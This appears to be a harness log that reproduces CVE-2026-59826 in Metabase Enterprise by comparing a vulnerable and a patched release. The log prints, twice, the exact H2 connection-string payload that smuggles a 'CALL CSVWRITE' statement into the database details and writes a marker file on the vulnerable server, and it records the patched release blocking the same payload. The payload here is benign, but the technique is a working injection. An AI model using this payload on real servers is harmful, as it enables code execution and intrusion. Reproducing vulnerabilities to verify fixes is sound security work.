[2026-07-17T07:11:43Z] Source identity: vulnerable parent=770276bdddee78aed8ee0f75cdddd61a744664d4 fixed=74032e5e0a5a70dc45a6a744d37b9ba24eee8d01 [2026-07-17T07:11:43Z] Pulling product images metabase/metabase-enterprise:v1.61.1 and metabase/metabase-enterprise:v1.61.2 if needed [2026-07-17T07:11:47Z] Starting vuln Metabase product container on shared worker network port 33001 using metabase/metabase-enterprise:v1.61.1 [2026-07-17T07:12:18Z] vuln health endpoint is reachable [2026-07-17T07:12:18Z] Starting fixed Metabase product container on shared worker network port 33002 using metabase/metabase-enterprise:v1.61.2 [2026-07-17T07:12:49Z] fixed health endpoint is reachable [2026-07-17T07:12:49Z] vuln setup token obtained; creating admin via /api/setup [2026-07-17T07:12:49Z] vuln admin session acquired [2026-07-17T07:12:49Z] fixed setup token obtained; creating admin via /api/setup [2026-07-17T07:12:50Z] fixed admin session acquired [2026-07-17T07:12:50Z] vuln enabling database routing on H2 database id 1 through product API [2026-07-17T07:12:50Z] vuln router API status=200 body=1 [2026-07-17T07:12:50Z] fixed enabling database routing on H2 database id 1 through product API [2026-07-17T07:12:50Z] fixed router API status=200 body=1 [2026-07-17T07:12:50Z] vuln attempt 1 calling product API endpoint with attacker-controlled H2 property payload [2026-07-17T07:12:50Z] vuln attempt 1 destination API HTTP status=200 body=[{"uploads_schema_name":null,"description":null,"features":["database-routing","window-functions/cumulative","test/dynamic-dataset-loading","basic-aggregations","temporal-extract","actions/custom","window-functions/offset","now","parameterized-sql","jdbc/statements","regex/lookaheads-and-lookbehinds","expression-literals","expressions/today","standard-deviation-aggregations","date-arithmetics","parameters/table-reference","expressions/date","actions","expression-aggregations","describe-is-nullable","saved-question-sandboxing","distinct-where","right-join","left-join","expressions/datetime","expressions/text","native-parameters","uuid-type","schemas","nested-queries","test/uuids-in-create-table-statements","expressions","test/create-table-without-data","uploads","regex","case-sensitivity-string-filter-options","describe-default-expr","binning","metadata/key-constraints","actions/data-editing","dependencies/native","datetime-diff","upload-with-auto-pk","describe-is-generated","inner-join","advanced-math-expressions","native-temporal-units","fingerprint","native-parameter-card-reference","metadata/table-existence-check"],"uploads_table_prefix":null,"cache_field_values_schedule":"0 0 2 * * ? *","router_database_id":1,"write_data_details":null,"timezone":null,"is_attached_dwh":false,"auto_run_queries":true,"metadata_sync_schedule":"0 34 * * * ? *","name":"pruva-cve-59826-vuln-1","settings":null,"caveats":null,"creator_id":1,"is_full_sync":false,"updated_at":"2026-07-17T07:12:50.372949Z","provider_name":null,"cache_ttl":null,"details":{"db":"file:/plugins/sample-database.db;USER=GUEST;PASSWORD=guest;TRACE_LEVEL_SYSTEM_OUT=1\\;CALL CSVWRITE('/tmp/pruva_vuln_attempt_1_marker.csv','SELECT 598261')=0"},"is_sample":false,"id":2,"is_on_demand":false,"engine":"h2","initial_sync_status":"incomplete","is_audit":false,"dbms_version":null,"uploads_enabled":false,"refingerprint":null,"created_at":"2026-07-17T07:12:50.372949Z","points_of_interest":null}] [2026-07-17T07:12:50Z] vuln attempt 1 dataset API HTTP status=202 destination_id=2 body={"data":{"rows":[[1]],"cols":[{"database_type":"INTEGER","lib/deduplicated-name":"1","lib/original-name":"1","name":"1","lib/source":"source/native","lib/source-column-alias":"1","source":"native","field_ref":["field","1",{"base-type":"type/Integer"}],"effective_type":"type/Integer","lib/desired-column-alias":"1","display_name":"1","base_type":"type/Integer"}],"native_form":{"lib/type":"mbql.stage/native","query":"SELECT 1"},"download_perms":"full","pivot-export-options":{"show-row-totals":true,"show-column-totals":true},"results_timezone":"GMT","format-rows?":true,"results_metadata":{"columns [2026-07-17T07:12:52Z] vuln attempt 1 marker created inside Metabase container: "598261" "598261" [2026-07-17T07:12:52Z] vuln attempt 2 calling product API endpoint with attacker-controlled H2 property payload [2026-07-17T07:12:52Z] vuln attempt 2 destination API HTTP status=200 body=[{"uploads_schema_name":null,"description":null,"features":["database-routing","window-functions/cumulative","test/dynamic-dataset-loading","basic-aggregations","temporal-extract","actions/custom","window-functions/offset","now","parameterized-sql","jdbc/statements","regex/lookaheads-and-lookbehinds","expression-literals","expressions/today","standard-deviation-aggregations","date-arithmetics","parameters/table-reference","expressions/date","actions","expression-aggregations","describe-is-nullable","saved-question-sandboxing","distinct-where","right-join","left-join","expressions/datetime","expressions/text","native-parameters","uuid-type","schemas","nested-queries","test/uuids-in-create-table-statements","expressions","test/create-table-without-data","uploads","regex","case-sensitivity-string-filter-options","describe-default-expr","binning","metadata/key-constraints","actions/data-editing","dependencies/native","datetime-diff","upload-with-auto-pk","describe-is-generated","inner-join","advanced-math-expressions","native-temporal-units","fingerprint","native-parameter-card-reference","metadata/table-existence-check"],"uploads_table_prefix":null,"cache_field_values_schedule":"0 0 22 * * ? *","router_database_id":1,"write_data_details":null,"timezone":null,"is_attached_dwh":false,"auto_run_queries":true,"metadata_sync_schedule":"0 26 * * * ? *","name":"pruva-cve-59826-vuln-2","settings":null,"caveats":null,"creator_id":1,"is_full_sync":false,"updated_at":"2026-07-17T07:12:52.588414Z","provider_name":null,"cache_ttl":null,"details":{"db":"file:/plugins/sample-database.db;USER=GUEST;PASSWORD=guest;TRACE_LEVEL_SYSTEM_OUT=1\\;CALL CSVWRITE('/tmp/pruva_vuln_attempt_2_marker.csv','SELECT 598262')=0"},"is_sample":false,"id":3,"is_on_demand":false,"engine":"h2","initial_sync_status":"incomplete","is_audit":false,"dbms_version":null,"uploads_enabled":false,"refingerprint":null,"created_at":"2026-07-17T07:12:52.588414Z","points_of_interest":null}] [2026-07-17T07:12:52Z] vuln attempt 2 dataset API HTTP status=202 destination_id=3 body={"data":{"rows":[[1]],"cols":[{"database_type":"INTEGER","lib/deduplicated-name":"1","lib/original-name":"1","name":"1","lib/source":"source/native","lib/source-column-alias":"1","source":"native","field_ref":["field","1",{"base-type":"type/Integer"}],"effective_type":"type/Integer","lib/desired-column-alias":"1","display_name":"1","base_type":"type/Integer"}],"native_form":{"lib/type":"mbql.stage/native","query":"SELECT 1"},"download_perms":"full","pivot-export-options":{"show-row-totals":true,"show-column-totals":true},"results_timezone":"GMT","format-rows?":true,"results_metadata":{"columns [2026-07-17T07:12:54Z] vuln attempt 2 marker created inside Metabase container: "598262" "598262" [2026-07-17T07:12:54Z] fixed attempt 1 calling product API endpoint with attacker-controlled H2 property payload [2026-07-17T07:12:54Z] fixed attempt 1 destination API HTTP status=400 body={"pruva-cve-59826-fixed-1":{"message":"H2 is not supported as a data warehouse"}} [2026-07-17T07:12:54Z] fixed attempt 1 was blocked by fixed validation as expected [2026-07-17T07:12:54Z] fixed attempt 2 calling product API endpoint with attacker-controlled H2 property payload [2026-07-17T07:12:54Z] fixed attempt 2 destination API HTTP status=400 body={"pruva-cve-59826-fixed-2":{"message":"H2 is not supported as a data warehouse"}} [2026-07-17T07:12:54Z] fixed attempt 2 was blocked by fixed validation as expected [2026-07-17T07:12:55Z] CVE-2026-59826 reproduction confirmed.